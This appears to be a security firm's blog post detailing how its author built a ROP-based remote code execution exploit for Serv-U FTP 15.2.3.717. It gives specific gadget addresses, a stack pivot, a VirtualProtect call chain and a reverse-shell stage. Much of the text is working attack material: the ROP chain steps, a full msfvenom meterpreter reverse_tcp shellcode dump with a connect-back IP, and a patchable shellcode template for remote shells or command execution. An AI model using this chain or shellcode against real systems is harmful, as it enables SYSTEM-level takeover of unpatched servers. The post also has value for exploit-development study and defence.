As part of our work on the Cosmos platform (formerly known as CAST) we sometimes have a requirement to weaponize vulnerabilities in order to achieve specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.
In this blog, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their blog post. Please read that article first and then come back here if you're interested in how we arrived at the point of NattySamson's PoC and our subsequent exploit.
We pick up at the point where Natty's PoC gives us a semi-reliable way to populate the r9
register with an attacker-supplied value that is subsequently used by a call r9
instruction. This gives us a way to control rip and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as NT AUTHORITY\System.
We'll keep the tooling simple. If you want to play along you'll need:
Note that I am not using Mona or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona.
If you don't care about the technical details and just want to grab the exploit, it's available here.
I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into rip
via a call r9
instruction. r9
is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.
Let's break the exploit development down into chunks. This will be a ROP exploit and loosely gets constructed like so:
r9
in order to kickstart code executionrsp
to point at the ROP chain in our payloadkernel32.dll!VirtualProtect
, which I'll use to make the stack executable (RWX)VirtualProtect
to change the stack's page protection from R-X to RWXI may or may not stick to that order!
The first three above points are all intertwined, so I'll deal with them at the same time. The question is: What memory address should I put into r9
in order to kickstart our ROP chain exploit? I must solve for:
rsp
must point to our ROP chain before the call r9
returns with a ret instruction. This is because of the way ret
works. Think of the ret
instruction as an equivalent of pop rax
; jmp rax
or more simply, pop rip
, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every ret instruction in the future.rsp
doesn't point to our ROP chain by the time ret
is called, I'm hosed.rsp
does not point to our ROP chain at the time of the PoC's call r9
, so our first ROP gadget must populate rsp with the address of our payload/ROP chain buffer and then call ret
.Whew. Tricksy. Fortunately, the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.
I can't stack pivot or reliably jump to a useful instruction or pivot to a ROP chain until I've found useful non-ASLR predictable, repeatable addresses.
The first thing to do is see if Serv-U.exe or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's PESecurity, available from https://github.com/NetSPI/PESecurity. It's a PowerShell script that scans executable files for security flags and produces a concise report, like so:
PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive
FileName : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : True
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : True
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that Serv-U.dll, etc. will always be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets.
As mentioned before, the stack pointer rsp
doesn't point to our exploit payload buffer at the time call r9
happens. This breaks everything because once the r9
function calls ret
the CPU will pop the return address off the stack at the address in rsp
and jmp
to it. In other words, execution resumes as normal. I can control r9
and therefore control where the call
jumps to, but I can't control where it returns to; I have to find a way to point rsp
at our payload and return to our ROP chain using only a single ROP gadget.
It turns out that our payload is actually stored at the address stored in rbp
. How do I know that? By examining the registers and the stack in a debugger at the point call r9
is executed by the CPU.
First the registers:
<0:008> r 00 0000000d`09bfebf0 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6 rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8 rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000 rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a r8=000001ed4d497f00 r9=4141414141414100 r10=000001ed4d497f00 r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001 r14=ffffffffffc91a32 r15=000001ed4d474e80 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6: 00000000`720b9636 41ffd1 call r9 {41414141`41414141}
We can see that the stack pointer and base pointers are nowhere near each other:
rsp = 0x00d09bfebf0 rbp = 0x1ed4d5a410a
There was nothing of our payload at rsp
's memory address, but what about rbp
?
0:013> db @rbp l128 00000253`5badfa9a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfaaa 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfaba 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfaca 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfada 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfaea 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfafa 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb0a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb1a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb2a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb3a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb4a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb5a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb6a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb7a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000253`5badfb8a 41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00 AAAAAAAA........ 00000253`5badfb9a 00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92 ..............s. 00000253`5badfbaa bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34 ..5....4Z.....p4 00000253`5badfbba 5a 90 ff 7f 00 00 00 22 Z......"
Bingo! So first order of the day is to move the address in rbp
to rsp
. To do that I need a ROP gadget that does something like:
mov rsp, rbp ret
It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures that allow unaligned memory accesses like Intel x64 that help us to find gadgets that aren't even part of the compiled code. It's a cool concept, check it out. Consider the following code:
0x18005d485 498be3 mov rsp, r11 0x18005d488 5d pop rbp 0x18005d489 c3 ret
The first instruction, mov rsp
, r11
, takes up three bytes \x49\x8b\xe3
and starts at address 0x18005d485
. Therefore, the next instruction is at an address 3 bytes higher at 0x18005d488
.
But what if I set the instruction pointer to address 0x18005d486
, which is between the two "valid" instruction addresses? The opcodes would be \x8b\xe3\x5d\xc3
, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:
% rasm2 -a x86 -b 64 -d 8be35dc3
mov esp, ebx
pop rbp
ret
Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte by byte to uncover all possible permutations of instructions by using the "/ad/a "
command like this:
% r2 Serv-U.dll
-- Ask not what r2 can do for you - ask what you can do for r2
[0x1801a4184]> "/ad/a mov rsp;ret;"
[0x1801a4184]>
The above command "/ad/a mov rsp;ret"
tells Radare2 to scan the Serv-U.dll
file for instructions that match a mov
followed by a ret
, and in which the mov instruction is writing something to the rsp
register. Each of the stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double-quotes.
Sadly for us, the above Radare2 search returned no results. Ok, let's try to find a gadget that has some kind of mov rsp, .*,
then any other instruction, and then a ret
:
[0x1801a4184]> "/ad/a mov rsp;.*;ret;"
0x180059ffb 498be3 mov rsp, r11
0x180059ffe 5d pop rbp
0x180059fff c3 ret
0x18005d485 498be3 mov rsp, r11
0x18005d488 5d pop rbp
0x18005d489 c3 ret
0x18005d986 498be3 mov rsp, r11
0x18005d989 5d pop rbp
0x18005d98a c3 ret
0x18005fa9a 498be3 mov rsp, r11
0x18005fa9d 415e pop r14
0x18005fa9f c3 ret
0x180063a5a 498be3 mov rsp, r11
0x180063a5d 5f pop rdi
0x180063a5e c3 ret
0x180064795 498be3 mov rsp, r11
0x180064798 5f pop rdi
0x180064799 c3 ret
...omitted for brevity...
0x180196569 498be3 mov rsp, r11
0x18019656c 5f pop rdi
0x18019656d c3 ret
0x1801a167f 498be3 mov rsp, r11
0x1801a1682 5f pop rdi
0x1801a1683 c3 ret
That's a LOT of matching gadgets! Remember, I want to put the address of our payload into rsp
. Let's rule out any gadgets where rbp
is popped off the stack; I’d like to avoid messing with more stack registers than absolutely necessary. I don't care if rdi
gets messed up, so those gadgets could be useful so long as r11
points to the location of our payload buffer on the stack.
To check r11
's value I used WinDBG to attach to the Serv-U process and compare the value of rbp
against r11
at the time call r9
is executed by the exploit:
(1c60.1c04): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6: 00000000`720b9636 41ffd1 call r9 {41414141`41414141} 0:013> r rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688 rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000 rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a r8=0000020058925d20 r9=4141414141414141 r10=0000020058925d20 r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001 r14=ffffffffff92b492 r15=000002005887c510 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6: 00000000`720b9636 41ffd1 call r9 {41414141`41414141} 0:013>
We can see that:
rbp=0000020058648b3a r11=0000020058648b2a
What good fortune! The r11
register points at an address 16 bytes up from rbp
, which points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into rdi
, and then pop the next bytes off the stack into rip
; given that I control the new stack, I therefore control the value of rip
, which means I now have a means to pivot the stack and continue execution from our ROP chain.
I chose the gadget address of 0x18010391a
from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.
kernel32!VirtualProtect
Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - executable. Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.
The function VirtualProtect
is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of Serv-U.dll
, but it didn't import VirtualProtect
, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect")
.
We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that Serv-U.dll
imports GetModuleHandleW
from kernel32.dll:
It also imports GetProcAddress
:
The address 0x1801c92c8
is a trampoline stub built into Serv-U.dll
that, when jumped to, redirects execution to the real kernel32!GetModuleHandleW
that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for 0x1801c9590
and kernel32!GetProcAddress
. In other words, the value stored at address 0x0x1801c92c8
is a pointer to the real GetModuleHandleW
function.
Let's dereference it in the debugger and double-check that it matches the real address of GetModuleHandleW
in this context. First, dereference the trampoline in Serv-U.dll
:
0:026> u poi(0x1801c92c8) KERNEL32!GetModuleHandleWStub: 00007ffd`19e4ce40 48ff2559370600 jmp qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)] 00007ffd`19e4ce47 cc int 3
Awesome. Does the same apply to GetProcAddress
?
0:026> u poi(0x1801c9590) KERNEL32!GetProcAddressStub: 00007ffd`19e4a780 4c8b0424 mov r8,qword ptr [rsp] 00007ffd`19e4a784 48ff25bd510600 jmp qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)] 00007ffd`19e4a78b cc int 3
Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate VirtualProtect
. In order to call the necessary functions I'll need to find some ROP gadgets the provide the necessary functionality.
I started by sketching out a rough plan of what I wanted to achieve.
moduleHandle = GetModuleHandleW(L"kernel32.dll")
VirtualProtect = GetProcAddress(moduleHandle, "GetProcAddress")
VirtualProtect(stackAddress, size, attributes, &results)
It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful?” Here's a few ideas:
mov rax, rbx ; ret
is much better than mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret
because the latter stomps on the values we want and it also messes with the stack due to the pop instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform only the desired operation and a ret)
then we have to settle for gadgets with extra baggage.pop
values off the stack into the four argument-passing registers (rcx
, rdx
, r8
, and r9
, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:pop rcx ; ret
pop rdx ; ret
pop r8 ; ret
pop r9 ; ret
pop r9
gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the r9
register, like so:
pop rax ; xchg r9, rax ; ret
jmp rax ; ret
or call rbx ; ret
can be chained together like so:pop rax
followed byjmp rax or jmp qword ptr [rax]
GetModuleHandleW
and GetProcAddress
. For example:mov rax, qword ptr [rax]
. Reads the value at the memory address in rax
and stores it in the rax
register.rax=0x123456789
then the above instruction reads the 8 bytes at memory address 0x123456789
and stores that value in the rax
register.I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent hours trying to find an easy way to put arbitrary values in the r9
register when calling into VirtualProtect
. Eventually I settled on a two-gadget chain that populated r9
via rax
, like so:
# Gadget 1
pop rax # we control the stack, so we can control the value popped into rax
ret
# Gadget 2
xchg rax, r9 # tadaaaa</p>
adc al, 0 # Effectively a NOP without consequences
add rsp, 0x38 # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
ret # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be.
The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by add rsp, 0x38,
but it did the job and was the best I had, so I went with it.
The GetModuleHandleW
function is defined as:
HMODULE GetModuleHandleW(
[in, optional] LPCWSTR lpModuleName
);
It returns a pointer (aka "handle" in Microsoft terminology) to specify the module (DLL, executable, etc) in memory. The pointer literally points to a complete DLL in memory if it's loaded. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:
ASCII:
"kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32
Wide String:
"kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00"
Handily enough, there is a wide string version of kernel32
in the Serv-U.dll
binary! It's located at 0x180313230
, as shown here in Hopper:
Note that it's denoted as type dw
, which is a wide string. Checking the result in the hex editor confirms that this is really a wide string:
Excellent. All it takes to call GetModuleHandleW(L"kernel32.dll")
is the following pseudo-code:
pop rcx # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
pop rax # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
jmp [rax] # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
mov rcx, rax # Save the returned handle in rcx for later
The handle for kernel32.dll
is returned in the rax
register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's .data
segment that I treat as a scratchpad for "variables" that hold data temporarily.
The GetProcAddress
function is defined as:
FARPROC GetProcAddress(
[in] HMODULE hModule,
[in] LPCSTR lpProcName
);
The first parameter is the handle I obtained from GetModuleHandleW
. The second is the name of the function I want to find: VirtualProtect
. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack.
The first step is to find a writable memory address in Serv-U's .data
segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows:
# Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
# Split the task so that two 8-byte chunks are written consecutively.
pop rdx # An unused address in Serv-U's data segment gets popped into rdx.
pop rax # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
mov [rdx], rax # Write "VirtualP" to the first 8 bytes of our .data memory chunk.
pop rdx # Pop the address of the next 8 bytes of .data memory into rdx.
pop rax # Pop "rotect\x00\x00" off the stack into the rax register.
mov [rdx], rax # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.
Now I can call GetProcAddress
:
# Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
# Assume rdx contains the address of the string "VirtualProtect\x00"
pop rax # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
jmp [rax] # Jump to GetProcAddress(handle, "VirtualProtect\x00")
# The address of the VirtualProtect function is returned in rax)
Phew! I now have the address of VirtualProtect
in rax
.
The VirtualProtect
function is defined as:
BOOL VirtualProtect(
[in] LPVOID lpAddress, # Starting address of memory to make executable (rounded down to nearest 4k page boundary).
[in] SIZE_T dwSize, # Number of bytes to make executable (rounded up to nearest 4k page boundary).
[in] DWORD flNewProtect, # Protection flags. In this case 0x40 = RWX.
[out] PDWORD lpflOldProtect # Return results in this variable. Must be a writable memory address!
);
Remember that the parameters are passed to this function in the rcx
, rdx
, r8
, and r9
registers, respectively. In this case:
rcx = Address of our payload buffer (i.e. the current stack address) rdx = 0x2000 (8kB or two 4k memory pages) r8 = 0x40 (readable, writable, executable) r9 = Address from .data segment of Serv-U
The second and third parameters are dead easy: Just pop them off the stack!
pop rdx # Pop 0x2000 off the stack pop r8 # Pop 0x40 off the stack
Getting the last argument is slightly trickier because we have no pop r9
gadget to work with; instead the compound gadget is used:
# 1st gadget
pop rax # Pop writable address off the stack into rax
ret
# 2nd gadget
xchg rax, r9 # Swap rax and r9 so that r9 now contains the writable address
adc al, 0 # Extra crap instruction does effectively no operation
add rsp, 0x38 # This part of the gadget moves the stack pointer up 0x38 bytes.
# We account for this in our exploit by skipping 0x38 bytes of our
# payload buffer before writing the next value to the buffer.
ret # Return to the next gadget
Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:
# 1st gadget
push rbp # Push an address near our stack onto the head of the stack.
pop rax # Pop the address off the stack into rax so that rax now contains the address of the stack.
add byte ptr [rax], al # Effective no operation in this context
ret # Return to next gadget
# 2nd gadget
mov rcx, rax # Put the (approximate) address of the stack into rcx
ret
At this point I have populated the registers and I just need to call VirtualProtect
to make our shellcode executable:
# Assuming we have address of VirtualProtect's trampoline in rax
jmp [rax]
ret
And that's it! The part of the stack on which our shellcode resides is now executable.
I took standard shellcode generated by msfvenom
and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:
[2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom -p
windows/x64/meterpreter/reverse_tcp LHOST=192.153.76.22 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x01\xbb\xc0\x99\x4c\x16\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
The IP address to which the shellcode connects to download the second-stage shellcode is at these offsets:
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00"
"PP" # connect-back port @ offs 244
"HHHH" # connect-back IP address @ offs 246
"\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58"
My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to use arbitrary shellcode stagers / Sliver instances / Metasploit instances at runtime without having to generate new shellcode every time.
I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:
shellcode = (
b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
